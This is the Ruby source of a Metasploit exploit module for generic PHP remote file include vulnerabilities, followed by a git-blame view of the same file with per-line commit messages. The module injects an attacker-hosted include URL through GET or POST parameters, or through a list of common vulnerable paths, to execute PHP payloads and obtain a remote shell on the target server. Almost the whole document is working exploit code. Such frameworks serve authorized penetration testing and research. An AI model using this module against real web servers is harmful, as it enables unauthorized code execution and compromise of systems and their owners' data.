modules/exploits/unix/webapp/php_include.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PHP Remote File Include Generic Code Execution',
			'Description'    => %q{
					This module can be used to exploit any generic PHP file include vulnerability,
				where the application includes code like the following:

				<?php include($_GET['path']); ?>
			},
			'Author'         => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
			'License'        => MSF_LICENSE,
			#'References'     => [ ],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					# Arbitrary big number. The payload gets sent as an HTTP
					# response body, so really it's unlimited
					'Space'       => 262144, # 256k
				},
			'DefaultOptions' =>
				{
					'WfsDelay' => 30
				},
			'DisclosureDate' => 'Dec 17 2006',
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))

		register_options([
			OptString.new('PATH', [ true , "The base directory to prepend to the URL to try", '/']),
			OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]),
			OptString.new('POSTDATA', [false, "The POST data to send, with the include parameter changed to XXpathXX"]),
			OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""]),
			OptPath.new('PHPRFIDB', [false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL",
				File.join(Msf::Config.install_root, "data", "exploits", "php", "rfi-locations.dat")
				])
			], self.class)
	end

	def check
		uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
		if(uri and ! uri.empty?)
			uri.gsub!(/\?.*/, "")
			print_status("Checking uri #{uri}")
			response = send_request_raw({ 'uri' => uri})
			return Exploit::CheckCode::Detected if response.code == 200
			print_error("Server responded with #{response.code}")
			return Exploit::CheckCode::Safe
		else
			return Exploit::CheckCode::Unknown
		end
	end

	def datastore_headers
		headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
		headers_hash = Hash.new
		if (headers and ! headers.empty?)
			headers.split(',').each do |header|
				key,value = header.split(':')
				headers_hash[key] = value.strip
			end
		end
		headers_hash
	end

	def php_exploit
		uris = []

		tpath = normalize_uri(datastore['PATH'])
		if tpath[-1,1] == '/'
			tpath = tpath.chop
		end

		# PHPURI overrides the PHPRFIDB list
		if (datastore['PHPURI'] and not datastore['PHPURI'].empty? and (datastore['POSTDATA'].nil? or datastore['POSTDATA'].empty?) )
			uris << datastore['PHPURI'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, "%"))
			http_method = "GET"
		elsif (datastore['POSTDATA'] and not datastore['POSTDATA'].empty?)
			uris << datastore['PHPURI']
			postdata = datastore['POSTDATA'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, "%"))
			http_method = "POST"
		else
			print_status("Loading RFI URLs from the database...")
			::File.open(datastore['PHPRFIDB'], "rb") do |fd|
				fd.read(fd.stat.size).split(/\n/).each do |line|
					line.strip!
					next if line.empty?
					next if line =~ /^#/
					next if line !~ /^\//

					uris << line.gsub('XXpathXX',
						Rex::Text.to_hex(php_include_url.sub(/\?$/, '') + '?', "%") # ? append is required
					)
				end
			end
			uris.uniq!
			print_status("Loaded #{uris.length} URLs")
		end

		# Very short timeout because the request may never return if we're
		# sending a socket payload
		timeout = 0.01

		# We can't make this parallel without breaking PHP findsock
		# Findsock payloads cause this loop to run slowly
		uris.each do |uri|
			break if session_created?

			# print_status("Sending #{tpath+uri}")
			begin
				if http_method == "GET"
					response = send_request_raw( {
						'global' => true,
						'uri'    => tpath+uri,
						'headers' => datastore_headers,
					}, timeout)
				elsif http_method == "POST"
					response = send_request_raw(
						{
							'global'  => true,
							'uri'     => tpath+uri,
							'method'  => http_method,
							'data'    => postdata,
							'headers' => datastore_headers.merge({
								'Content-Type'   => 'application/x-www-form-urlencoded',
								'Content-Length' => postdata.length
							})
						}, timeout)
				end
				handler
			rescue ::Interrupt
				raise $!
			rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
				print_error("The target service unreachable")
				break
			rescue ::OpenSSL::SSL::SSLError
				print_error("The target failed to negotiate SSL, is this really an SSL service?")
				break
			rescue ::Exception => e
				print_error("Exception #{e.class} #{e}")
			end

			Thread.pass
		end
	end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-20 19:40:50 -06:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Drop phpi to normal ranking, it eats too much time 2011-10-18 09:10:45 +00:00			`Rank = NormalRanking`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::HttpServer::PHPInclude`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00
			`def initialize(info = {})`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`super(update_info(info,`
Cleanup the titles of many exploit modules 2012-02-20 19:25:55 -06:00			`'Name' => 'PHP Remote File Include Generic Code Execution',`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`'Description' => %q{`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`This module can be used to exploit any generic PHP file include vulnerability,`
			`where the application includes code like the following:`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`<?php include($_GET['path']); ?>`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`},`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00			`'Author' => [ 'hdm' , 'egypt', 'ethicalhack3r' ],`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`'License' => MSF_LICENSE,`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00			`#'References' => [ ],`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`'Compat' =>`
initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs. 2008-09-24 04:41:51 +00:00			`{`
			`'ConnectionType' => 'find',`
			`},`
update space requirements 2010-06-02 05:04:24 +00:00			`# Arbitrary big number. The payload gets sent as an HTTP`
			`# response body, so really it's unlimited`
			`'Space' => 262144, # 256k`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`},`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`'DefaultOptions' =>`
			`{`
see #684 , adds checksum support, updates modules to use it, fixes some wfs_delay/WfsDelay issues 2010-08-25 20:55:37 +00:00			`'WfsDelay' => 30`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`},`
Add disclosure dates to all the exploit modules that didn't have one 2011-10-15 21:09:17 +00:00			`'DisclosureDate' => 'Dec 17 2006',`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0))`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`register_options([`
			`OptString.new('PATH', [ true , "The base directory to prepend to the URL to try", '/']),`
			`OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]),`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00			`OptString.new('POSTDATA', [false, "The POST data to send, with the include parameter changed to XXpathXX"]),`
Added headers support to php_include module 2012-10-05 23:00:38 +02:00			`OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""]),`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`OptPath.new('PHPRFIDB', [false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL",`
			`File.join(Msf::Config.install_root, "data", "exploits", "php", "rfi-locations.dat")`
			`])`
			`], self.class)`
Initial support for PHP payloads 2006-12-17 07:57:51 +00:00			`end`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
add a simple check for the generic php exploits 2009-09-10 05:24:03 +00:00			`def check`
Fixes #2974 . Adds an "Unknown" level to Exploit::CheckCode, fixes the URI check for exploit/unix/webapp/php_include (which was relying on Unknown). 2010-10-15 12:24:17 +00:00			`uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`if(uri and ! uri.empty?)`
			`uri.gsub!(/\?.*/, "")`
			`print_status("Checking uri #{uri}")`
			`response = send_request_raw({ 'uri' => uri})`
Added headers support to php_include module 2012-10-05 23:00:38 +02:00			`return Exploit::CheckCode::Detected if response.code == 200`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`print_error("Server responded with #{response.code}")`
			`return Exploit::CheckCode::Safe`
			`else`
			`return Exploit::CheckCode::Unknown`
add a simple check for the generic php exploits 2009-09-10 05:24:03 +00:00			`end`
			`end`
More reliable reverse shell 2008-03-04 07:34:26 +00:00
Added headers support to php_include module 2012-10-05 23:00:38 +02:00			`def datastore_headers`
			`headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""`
			`headers_hash = Hash.new`
			`if (headers and ! headers.empty?)`
			`headers.split(',').each do \|header\|`
			`key,value = header.split(':')`
			`headers_hash[key] = value.strip`
			`end`
			`end`
			`headers_hash`
			`end`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
Added headers support to php_include module 2012-10-05 23:00:38 +02:00			`def php_exploit`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`uris = []`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`tpath = normalize_uri(datastore['PATH'])`
Added a path to prepend 2010-02-16 05:24:31 +00:00			`if tpath[-1,1] == '/'`
			`tpath = tpath.chop`
			`end`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00
			`# PHPURI overrides the PHPRFIDB list`
Catch nil first before do .empty? 2011-10-17 15:59:57 +00:00			`if (datastore['PHPURI'] and not datastore['PHPURI'].empty? and (datastore['POSTDATA'].nil? or datastore['POSTDATA'].empty?) )`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`uris << datastore['PHPURI'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, "%"))`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00			`http_method = "GET"`
			`elsif (datastore['POSTDATA'] and not datastore['POSTDATA'].empty?)`
			`uris << datastore['PHPURI']`
			`postdata = datastore['POSTDATA'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, "%"))`
			`http_method = "POST"`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`else`
			`print_status("Loading RFI URLs from the database...")`
			`::File.open(datastore['PHPRFIDB'], "rb") do \|fd\|`
			`fd.read(fd.stat.size).split(/\n/).each do \|line\|`
			`line.strip!`
			`next if line.empty?`
			`next if line =~ /^#/`
			`next if line !~ /^\//`

			`uris << line.gsub('XXpathXX',`
			`Rex::Text.to_hex(php_include_url.sub(/\?$/, '') + '?', "%") # ? append is required`
			`)`
			`end`
			`end`
			`uris.uniq!`
			`print_status("Loaded #{uris.length} URLs")`
			`end`

			`# Very short timeout because the request may never return if we're`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`# sending a socket payload`
			`timeout = 0.01`

Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`# We can't make this parallel without breaking PHP findsock`
			`# Findsock payloads cause this loop to run slowly`
			`uris.each do \|uri\|`
			`break if session_created?`
More reliable reverse shell 2008-03-04 07:34:26 +00:00
Ensure that errors in the PHPInclude mixin lead to the service being stopped. Handle unreachable services in the php_include module better. Fix database-enabled tab completion to be workspace friendly 2010-09-21 02:52:49 +00:00			`# print_status("Sending #{tpath+uri}")`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`begin`
Solved most of msftidy issues with the /modules directory 2011-11-28 04:42:59 +00:00			`if http_method == "GET"`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00			`response = send_request_raw( {`
			`'global' => true,`
			`'uri' => tpath+uri,`
Added headers support to php_include module 2012-10-05 23:00:38 +02:00			`'headers' => datastore_headers,`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00			`}, timeout)`
			`elsif http_method == "POST"`
			`response = send_request_raw(`
			`{`
			`'global' => true,`
			`'uri' => tpath+uri,`
			`'method' => http_method,`
			`'data' => postdata,`
Added headers support to php_include module 2012-10-05 23:00:38 +02:00			`'headers' => datastore_headers.merge({`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00			`'Content-Type' => 'application/x-www-form-urlencoded',`
Added headers support to php_include module 2012-10-05 23:00:38 +02:00			`'Content-Length' => postdata.length`
			`})`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00			`}, timeout)`
			`end`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`handler`
			`rescue ::Interrupt`
			`raise $!`
Ensure that errors in the PHPInclude mixin lead to the service being stopped. Handle unreachable services in the php_include module better. Fix database-enabled tab completion to be workspace friendly 2010-09-21 02:52:49 +00:00			`rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused`
			`print_error("The target service unreachable")`
			`break`
Quit when we get an SSL exception 2010-09-25 03:14:21 +00:00			`rescue ::OpenSSL::SSL::SSLError`
jduck the grammar checker strikes again (thanks!) 2010-09-25 04:54:10 +00:00			`print_error("The target failed to negotiate SSL, is this really an SSL service?")`
Quit when we get an SSL exception 2010-09-25 03:14:21 +00:00			`break`
Ensure that errors in the PHPInclude mixin lead to the service being stopped. Handle unreachable services in the php_include module better. Fix database-enabled tab completion to be workspace friendly 2010-09-21 02:52:49 +00:00			`rescue ::Exception => e`
			`print_error("Exception #{e.class} #{e}")`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`end`
Support POST. Feature #5571 2011-10-04 16:02:52 +00:00
Explicitly yield to other threads after each request, reducing the chance that this module will eat all cycles. 2011-03-02 05:03:20 +00:00			`Thread.pass`
Uber-fast-get-me-a-php-shell mode :) 2010-02-15 17:59:54 +00:00			`end`
			`end`
make php findsock work again for php_eval and php_include 2009-06-20 05:50:52 +00:00			`end`